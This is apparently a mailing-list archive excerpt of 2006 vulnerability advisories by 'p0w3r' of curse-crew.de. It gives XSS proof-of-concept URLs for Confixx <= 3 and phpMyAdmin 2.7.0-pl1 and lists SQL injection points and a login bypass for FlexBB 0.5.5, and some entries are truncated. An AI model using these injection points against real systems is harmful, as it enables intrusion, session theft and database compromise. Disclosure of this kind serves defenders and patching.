from:"kr4ch"

Confixx <= 3

2006-06-18 Thread kr4ch

p0w3r ~ curse-crew.de Examples: [confixx]/ftplogin/[username]/ftp_index.php?path=alert('p0w3r oWnZ')

Confixx <= 3

2006-06-18 Thread kr4ch

Software: Confixx <= 3 Vendor: http://www.swsoft.com/ Discovered by: p0w3r - curse-crew.de Example: [confixx]/user/[username]/tools_ftp_pwaendern.php?account=alert('p0 w3r oWnZ')

FlexBB v0.5.5 BETA [SQL Inj] [XSS] [Login bypass]

2006-04-17 Thread kr4ch

App: FlexBB v0.5.5 BETA Advistory by: p0w3r - curse-crew.de SQL Inj: magic_quotes_gpc = off /index.php?page=showprofile&id=1'[SQL]/* /index.php?page=forums&forumid=1'[SQL]/* /index.php?page=viewthread&threadid=1'[SQL]/* /index.php?page=editpost&threadid=1'[SQL]/* Login bypass: magic_quotes_gpc =

phpMyAdmin 2.7.0-pl1

2006-04-13 Thread kr4ch

App: phpMyAdmin 2.7.0-pl1 Advistory by: p0w3r Exploit: /phpmyadmin/sql.php?lang=de-utf-8&server=1&collation_connection=utf8_general_ci&db=fu&table=fu&goto=tbl_properties_structure.php&back=tbl_properties_structure.php&sql_query=[XSS] Example: /phpmyadmin/sql.php?lang=de-utf-8&server=1&collation_c